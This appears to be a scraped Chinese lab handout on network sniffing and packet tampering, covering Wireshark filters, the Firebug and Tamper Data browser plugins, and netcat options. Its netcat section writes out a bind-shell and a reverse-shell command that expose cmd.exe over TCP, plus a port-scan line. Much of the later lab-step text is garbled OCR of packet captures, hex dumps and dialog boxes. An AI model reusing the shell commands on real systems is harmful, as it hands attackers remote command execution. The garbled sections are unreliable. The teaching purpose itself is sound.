实验二——网络监听与数据包修改.docx

资源描述

《实验二——网络监听与数据包修改.docx》由会员分享，可在线阅读，更多相关《实验二——网络监听与数据包修改.docx（19页珍藏版）》请在三一办公上搜索。

1、实验名称网络监听与数据包修改工具使用练习实验目的通过实验，使学生掌握协议分析工具的使用方法，能够利用协议分析工具分析数据包的内容，更加深入理解IP/TCP/HTTP协议。另外，了解Firefox浏览器调试工具以及netcat工具的基本使用方法。实验平台以win2003为主机，ubuntu为服务器实验工具1. 掌握网络抓包分析工具WireShark的使用2. 掌握IP/TCP/HTTP协议分析技能3. 掌握Firefox浏览器调试工具的使用4. 掌握netcat工具的使用实验步骤【实验原理】WiresharkWireshark是一个有名的网络端口探测器，是可以在Windows、Unix等各种

2、平台运行的网络监听软件，它主要是针对TCP/IP协议的不安全性对运行该协议的机器进行监听。其功能相当于Windows下的Sniffer，都是在一个共享的网络环境下对数据包进行捕捉和分析，而且还能够自由地为其增加某些插件以实现额外功能。其最常用的功能是被攻击者用来检测被攻击电脑通过23（telnet）和110（pop3）端口进行的一些明文传输数据，以轻松得到用户的登录口令和邮件账号密码。对于网络管理员来说，也可以通过抓包分析，来确定一些异常的流量和局域网内部的非正常用户与外界的通信，比如说对于现在比较占用网络带宽的诸如Bit Torrent等P2P应用软件流量，通过使用该软件确定这

3、些流量，网络管理员就可以使用流量控制（TC）的方法来规范、合理的分配带宽资源，提高网络的利用率。Wireshark可以在http:/www.wireshark.org/download/上下载，该软件有极其方便和友好的图形用户界面，并且能够使得用户通过图形界面的配置和选择，针对多块网卡、多个协议进行显示，效果非常好。目前最新版本为：Wireshark 0.990Wireshark 安装后自动安装 winpcap 4.0，Winpcap 是 UNIX 下的 libpcap 移植到 windows 下的产物，他是一个GPL项目。Winpcap工作于驱动（Driver）层，所以能以很高的效率

4、进行网络操作。Winpcap提供了以下强大的功能：1. 捕获原始的数据包；2. 设置filter,只捕获自己敢兴趣的数据包；3. 方便的把捕获的数据包输出到文件和从文件输入；4. 发送原始的数据包；5. 统计网络流量。/ Wireshark主窗口有很多的GUI程序组成（1）File（文件）：这个菜单包含：打开文件、合并文件、保存/打印/导出整个或部分捕获文件、退出。（2）Edit（编辑）这个菜单包括：查找包、时间参照、标记一个或多个包、设置参数、（剪切、复制、粘贴）。（3）View（查看）：这个菜单控制捕获数据的显示，包括：给定特定的一类包标以不同的颜色、字体缩放、在一个新窗口中显示一

5、个包、展开&折叠详细信息面板的树状结构。（4）Go：这个菜单实现转到一个特定包。.（5）apture（捕获）：这个菜单实现开始、停止捕获，编辑捕获过滤条件的功能。（6）Analyze（分析）：这个菜单包含编辑显示过滤、enable（开）或disable（关）协议解码器、配置用户指定的解码方法、追踪一个TCP流。（7）Statistics（统计）：该菜单完成统计功能。包括捕获的包的一个摘要、基于协议的包的数量等树状统计图等许多功（8）Help（帮助）这个菜单包含了一些对用户有用的信息。比如基本帮助、支持的协议列表、手册页、在线访问到网站等等。/ 设置Wireshark的过滤规则在用Wire

6、shark截获数据包之前，应该为其设置相应的过滤规则，可以只捕获感兴趣的数据包。Wireshark使用与Tcpdump相似的过滤规则，并且可以很方便地存储已经设置好的过滤规则。要为Wireshark配置过滤规则，首先单击“Capture ”选单，然后选择“Capture Filters.” 菜单项，打开“Wireshark ： Capture Filter”对话框。因为此时还没有添加任何过滤规则，因而该对话框右侧的列表框是空的。在Wireshark中添加过滤器时，需要为该过滤器指定名字及规则。图1：为Wireshark添加一个过滤器例如，要在主机192.168.0.3和192.168.

7、0.11间创建过滤器，可以在“Filter name”编辑框内输入过滤器名字“cjh”，在“Filter string”编辑框内输入过滤规则“host 192.168.0.3 and 192.168.0.11”，然后单击“新建”按钮即可。/ 应用WireShark过滤规则进行抓包要将过滤器应用于嗅探过程，需要在截获数据包之前或之后指定过滤器。要为嗅探过程指定过滤器，并开始截获数据包，可以单击“Capture”选单，打开“iterface”对话框，单击要抓包的网卡对应的“Options:”按钮，然后对该网络接口进行过滤器设置，其设置内容包括： Interface （接口）这个字段指定在哪个

8、接口进行捕获。这是一个下拉字段，只能从中选择Wireshark识别出来的接口，默认是第一块支持捕获的非loopback接口卡。如果没有接口卡，那么第一个默认就是第一块loopback接口卡。在某些系统中，loopback接口卡不能用来捕获（loopback 接口卡在Windows平台是不可用的）。 IP address（IP 地址）所选接口卡的IP地址。如果不能解析出IP地址，则显示unknown Link-layer header type（链路层头类型）除非你在极个别的情况下可能用到这个字段，大多数情况下保持默认值。具体的描述，见” Buffer size: n megabyte（s

9、）（缓冲区大小：n 兆）输入捕获时使用的buffer的大小。这是核心buffer的大小，捕获的数据首先保存在这里，直到写入磁盘。如果遇到包丢失的情况，增加这个值可能解决问题。 Capture packets in promiscuous mode （在混杂模式捕获包）这个选项允许设置是否将网卡设置在混杂模式。如果不指定，Wireshark仅仅捕获那些进入你的计算机的或送出你的计算机的包。（而不是LAN网段上的所有包）. Limit each packet to n bytes （限制每一个包为 n 字节）这个字段设置每一个数据包的最大捕获的数据量。有时称作snaplen。如果disable

10、这个选项默认是65535,对于大多数协议来讲中够了。 Capture Filter （捕获过滤）这个字段指定一个捕获过滤。“在捕获时进行过滤”部分进行讨论。默认是空的，即没过过滤。也可以点击标为Capture Filter的按钮,Wireshark将弹出Capture Filters（捕获过滤）对话框，来建立或者选择一个过滤。在选择了所需要的过滤器后，单击确定”按钮，整个嗅探过程就开始了。Wireshark可以实时显示截获的数据包，因此能够帮助网络管理员及时了解网络的运行状况，从而使其对网络性能和流量能有一个比较准确的把握。FirefoxFirebug是Firefox下的一款开发类插

11、件，现属于Firefox的五星级强力推荐插件之一。它集HTML查看和编辑、Javascript控制台、网络状况监视器于一体，是开发JavaScript、 CSS、HTML和Ajax的得力助手。在安装好插件之后，先用Firefox浏览器打开需要测试的页面，然后点击右下方的绿色按钮或使用快捷键F12唤出Firebug插件，它会将当前页面分成上下两个框架，如图2所示。图2： Firebug插件展开图示Tamper-data可监视HTTP请求并记录下每个请求所耗费的时间，并能够任意修改浏览器发出的HTTP请求的头的内容。可利用修改请求头的功能来调试程序、寻找安全漏洞，也利用监视功能找出应用程序

12、瓶颈0 Tamper-data的使用很简单，点击Firefox菜单栏上“工具”菜单项里面的“Tamper Data”，就会弹出Tamper Data的主窗口。 - -L 1 1 11:36:2. ms msunkn. GETpendingunknownhttp:.LOAD.NORMAL1:36:2. ms msunkn. GETpendingunknownhttp:.LOAD.NORMAL1:36:2. ITIS msunkn. GETpendingunknownhttp:.LOAD.NORMAL1:36:2. ms msunkn. GETpendingunknownhttp:.LOAD.N

13、ORMAL1:36:2.,110 ms110 ms1577 GET200image/jpeghttp:.LOAD.NORMAL1:36:2. ms ms-1GETLoaded .unknownhttp:.LOAD._FROM_CAC.Request Header NameRequest Header ValueResponse Header Name| Response Header ValutHostrcm-images. amazon .com StatusOK - 200User-AgentMozilla/5.0 (Windows; U. fServerServerAcceptimage

14、/png/+;q=0.5 LLast-ModifiedWed, 13 Sep 2006 02:Accept-EncodinggziPj deflateContent-Typeimage/jpegAccept-CharsetUTF-S/TContent-Length1577图3： Tamper-data插件展开图示:NetcatNetcat是一个简单而有用的工具，通过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接。参数介绍：nc.exe -h即可看

15、到各参数的使用方法。基本格式：nc -options hostname ports ports .nc -l -p port options hostname port-d后台模式-e prog程序重定向，一旦连接，就执行危险!-g gateway source-routing hop points, up to 8-G num source-routing pointer: 4, 8, 12,.-h帮助信息-i secs延时的间隔-l监听模式，用于入站连接-L连接关闭后,仍然继续监听-n指定数字的IP地址，不能用hostname-o file记录16进制的传输-p port本地端口号-r随机

16、本地及远程端口-s addr本地源地址-t使用TELNET交互方式-u UDP模式-v详细输出-用两个-v可得到更详细的内容-w secs timeout 的时间-z将输入输出关掉-用于扫描时端口的表示方法可写为M-N的范围格式。基本用法：1）连接到REMOTE主机，例子：格式：nc -nvv 192.168.x.x 80讲解：连到192.168.x.x的TCP80端口2）监听LOCAL主机，例子：格式：nc -l -p 80讲解：监听本机的TCP80端口3）扫描远程主机，例子：格式：nc -nvv -w2 -z 192.168.x.x 80-445讲解：扫描192.168.x.x的TCP80

17、到TCP445的所有端口4）REMOTE主机绑定SHELL，例子：格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口5）REMOTE主机绑定SHELL并反向连接，例子：格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口6）发送编写好的数据包内容，例子：格式 1： nc -nvv 192.168.x.x 80 hrrp SYNJ

18、5eq=o Len=0 M55=l192.168.16.17192.168.16.217TCP51248 http ACKseq=l Ack=0 win=6!192.168.16.17192.168.16.217TCP51249 hrrp ACK5eq=l Ack=o Win=65192.168.16.17192.168.16.217TCP512 51 http ACKseq=l Ack=0 win=6!192.168.16.17192.168.16.217TCP5124 5 hrrp ACK5eq=366 Ack=2920 192.168.16.17192.168.16.217HTTPget

19、 /siteFi1es/inner/search/script.j;192.168.16.17192.168.16.217TCP5124 8 hrrp am5eq=360 Ack=2426 V192.168.16.17192.168.16.217HTTPGET /sitef11es/bairong/scr1pts/json.HTTPget /sitetl 1es/balronq/scr1 pts/stT7pl192.lh3.16.17192.168.16.17192.168.16.17192.168.16.17192.168.16.17192.168.16.17192.168.16.17192

20、.lh3.16.217192.168.16.217192.168.16.217192.168.16.217192.168.16.217192.168.16.217192.168.16.217TCPTCPTCPTCPTCPTCPTCP512 51 http ACKJ Seq=3 66 Ack=254 V 51249 hrrp ACK Seq=371 Ack=2920 V 51243 hrrp ACK Seq=374 Ack=7300 V 51243 hrrp ACK Seq=374 Ack=10220 51243 hrrp ACK Seq=374 Ack=13140 51243 hrrp ACK

21、 Seq=374 Ack=16060 51243 hrrp ACK Seq=374 Ack=18980d 1I- i- !- r A L y Um 一 A J*i lx 一 J2.使用IE浏览器，在“工具-Internet选项-高级”中选择“使用HTTP1.1”,访问siteserver cms网站或者EmpireCMS网站抓包，查看HTTP/1.1的request数据包的内容;)!$ -fn . . E. .wc. ?,.p. . . . n-以-p. ge t /I ndex html? r=698 HTO 8 8 8 4 o H 1 7 55 0 0 5 8 4 C 5 6 4 o Id

22、 4 O 0 19 6 2 8 0 3 e 8 0 18 6 3 7 8 19 9 2 H 5 6 3 do e f 6 2 c 3 2 3 dc2od6 2 0 2 3 p- f b 4 27 3 9 5 74 6 3 5f 2 0 8 4 5 o o c 7f o 4 f 4 5 . o o o f8 0 5 0 31 o o o c2 4 0 0 6 4 3 3 b d Qr_ _h_ T- _h-9 7 8d 4 2 5 c 9 7 c e 9 o 8 o 2 d o 6 0 2 0 150000001000200030004 0192.168.16.17192.168.16.217T

23、CP51219 http 5YN Seq=0 Len=0 MSS=1192.168.16.17192.168.16.217TCP51219 http ACK Seq=l Ack=0 Win=6!192.168.16.17192.168.16.217HTTPGET /index.hrm1?_r=69J HTTP/1.0192.16S.16.17192.16S.16.217TCP51219 http ACK Seq519 Ack=2920 V-192.168.16.17192.168.16.217TCP51219 http ACK Seq519 Ack=4380 V192.168.16.17192

24、.168.16.217TCP51219 http ACK Seq519 Ack=7300 V192.168.16.17192.168.16.217TCP51219 http ACK Seq519 Ack=10220192.168.16.17192.168.16.217TCP51219 http ACK Seq519 Ack=13140192.163.IS.17192.163.IS.217TCP51219 http ACK Seq519 Ack=16060192.168.16.17192.168.16.217TCP51219 http ACK Seq519 Ack=18980192.168.16

25、.17192.168.16.217TCP51219 http ACK Seq519 Ack=21900192.168.16.17192.168.16.217TCP51219 http ACK Seq519 Ack=24820192.168.16.17192.168.16.217TCP51219 http ACK Seq519 Ack=27740192.168.16.17192.168.16.217TCP51219 http ACK Seq519 Ack=30660192.168.16.17152.168.16.217TCP51219 http ACK Seq519 Ack=32661I 192

26、.168.16.17ly2.168.lh.217TCPTCP Window Update 51219 http ACI1 Q-? 1 .a 1 A I 71 Q-? 1 ftQ 1 A7ki丁丁口亡匚丁/cf-x/l e, le m-ttd /1 CilI_d田 Frarnp 3 (572 bytes on wire, 572 bytes captured)|田 Ethernet II, Src: 00:24 : 7e: 6d : 2d: 27 COO: 24 : 7e: 6d :2d:27), Dst: Unware_94 :21:80 COO: Oc: 29: _i+i internet

27、Protocol. src: 192.168.16.17 C192.168.16.17-). Dst: 192.168.16. 217 fl92.168.16. 2： _1H在“工具-Internet选项-高级”中不选择“使用HTTP1.1”,K.Internet 选项常规安全隐私内容连接程序高级日设置：知HTTF 1.1设置r全配置日的安全配置- 瘢性，从而减土。迁增强的安使用 HTTP 1. 1通过代理连接便用HTTP 1.1安全不将加密的页面存盘中正确显示，IrLterne t Expl多信息，请参R0对无效站点证书发出警告0关闭浏览器时活空Internet临时文件夹0检查发行商的

28、证书吊销状态0检查服务器证书吊销状态需要重启动）0检查下载的程序的釜名PI启用集成Windows身份验证儒要重启动）0启用配置文件助理使用 SSL 2. 0使用 SSL 3. 0n 便甲 TTS 1 n二I ii j_r还原状认设置旧）|确定 | 取消 | 应用（A）访问siteserver cms网站或者EmpireCMS网站抓包，查看HTTP/1.0的request数据包的内容;对比二者的区别Captured PacketsTotal5% oftotalSCTP00.0%TCP5100.0%UDP00.0%ICMP00.0%ARP00.0%OSPF00.0%GRE00.0%NetBIOS0

29、0.0%IPX00.0%VINES00.0%Other00.0%H Tireshark： Capture rob Intel (R)-He-|n| x|Running00:00:11StopSourceDestinationProtocolInfo192.168.16.206192.168.16.206TCPTCP51270 http SYN Seq=0 Lph=0 MSS=151270 http ACK Seq=l Ack=0 Win=6t192.168.16.6192.168.16.6HTTP192.168.16.6192.168.16.206TCP192.168.16.6192.168.

30、16.20651270 http ACK 5eq=494 Ack=172 WJTCPR3T, ACK 沮J=4 94 ACJd田 Frame 3 (559 byres on wire, 559 byres capruredj1田 Ethernet n, src: 00:23:8b:de:fe:f5 (00:23:8b:de:fe:f5), Dst: vmware_4c:a8:db (00:0c:29: S-lnternet Protocol. 5rc: 192.168.16.6 C192.168.16.6l. Dst: 192.168.16.206 fl92.168.16.206Jj j i

31、t. ! 7 ：._：；：-.F. P. .GET / HTTP./1.10 8 8 0 15 o A- 1 o 3 & 5 0 0 0 e.4 c 8 o 2 & o 6f 1 1 Q o od c 3 t 8 o 7bf d o 1 8b 2 V5 8 A- 8 o _k f a c 1 5 t 2 0 5 0 4 Ll_o 5 d c 8b a 4 -n d 7 8 o 5 _J bf 5 CO CO d 8 5 _d o 4 V3 6 d 1 o 2 o 7 o 2 T o o c If c o 4 9 o 2 t b o o o o c d o 5 o 2 V8 0 0 0 4. A

32、- 4 o o 5 V c A- 6 1 5 _k4 3 4 2 4 t9 7 8 e 7 _J 2 3 c o 4 _k c 1 e 4 o o 2 c o o -n 0 2 0 10 o o 1 o o -n00000010002000300040File/CADOCUME-IVkDMINMILOCALS-nTempletherXXXXMPC. |p： 5 D: 5 M: 0 Drops: 02.安装firefox浏览器，安装firebug与tamper data插件，打开火狐浏览器，点击菜单栏里面的工具一一附加组件一一“设置标志”一一从文件安装附加组件一一选中组建并点击打开一一重启浏览

33、器便成功用firebug分析访问siteserver cms网站或者EmpireCMS网站的过程，打开火狐浏览器，点开网站，点击F12键banongsoftSiteServer CMSSiteServer CMS首页-系统帮助管理员登录帐号：密码：验证码：1477PI日国回| 编辑 I body htal果式十让牡由的拜式布局 DOM：+： IstTle. css第 1 行）color: #333333;feint -fam i 1? : Tahoma. V e r dana. Aria； serif;fcmt-Ei ze ： 12pE:I 王 | : t i onkeep-：dli v

34、eRefererhttp: /I:c:ilhoet: 8080/si te-Cooki eBAIRLING. VC. AHMIinjjGIN=B261 Response Header N：=jrieResponse Header V：=J_ueStatusOK - 200ConterLt-Lerigth394ConterLt-Tjei m age./ gi Last-Mcidi fi edMon, 08 Juul 2009 05:51:41 A:ept-R：dTLgeEbytesEtag44HTc32de7c91:377ServerMi crusuft-IIS/6. 0X-Powered-Ey

35、ASP.NETDateSat, 11 Jutl 2011 07:15:14 Si teS网站内容管理系统（Si te载入程序x4-文件（Z）编辑（1）查看（V）历史（S）书签工具（I）帮助（H）ht tp: /I o c:lhu e t: 8080/ sites er ver/1 o a di ng. ：EpK?Redir e c tTyp e=Lo a di转入中，请稍候r件编辑虐）查看世）历史书签工具堂）帮助但）SiteServei-网站内容管理系统（Siteht tp: / /1 oc alh 口 e t: 80130/ sites er ver/1 m ai n. aspnSiteS

37、tied) 一 TiresharkFile Edit View Go Capture Analyze Statistics Help鼠酎厚麒叙l四 * %昌回急峻由否殳W No.,TimeSourceDestinationDrotocolInfo WTTHWA T1W UDPSource port: 65158 Destl ridtl20.218724192.168.16.26192.168.16.255NBN5Name query NE； Ww. E；AI DU. COM(30.408250192.168.16.16192.168.16.255NBNSName query NEi MSH0M

38、E40.457064192.163.16.26192.168.16.255NBN5Name query NB WWW. bai du. comi；50.490269192.168.16.13192.168.16.255NBN5Name query NB .CN00:60.537776192.168.16.26192.168.16.255NBNSName query NEi WWW. BAIDU.COMC70.580930192.163.16.26192.168.16.255NBN5Name query NB ww. bai du. comi；80.605081192.168.16.26192.168.16.255NBN5Namp query NB WWW. bai du. comi；90.706044te80:elte:8c92:ceff02:1:2DHCPV6sol 1 cit100.724083te80:6d90:bc03:98ffO2：1：2DHCPV6sol 1cir110.738880Cisco_Ob:35:8aspanni ng-tree-(f orSTPconf. ROOT

展开阅读全文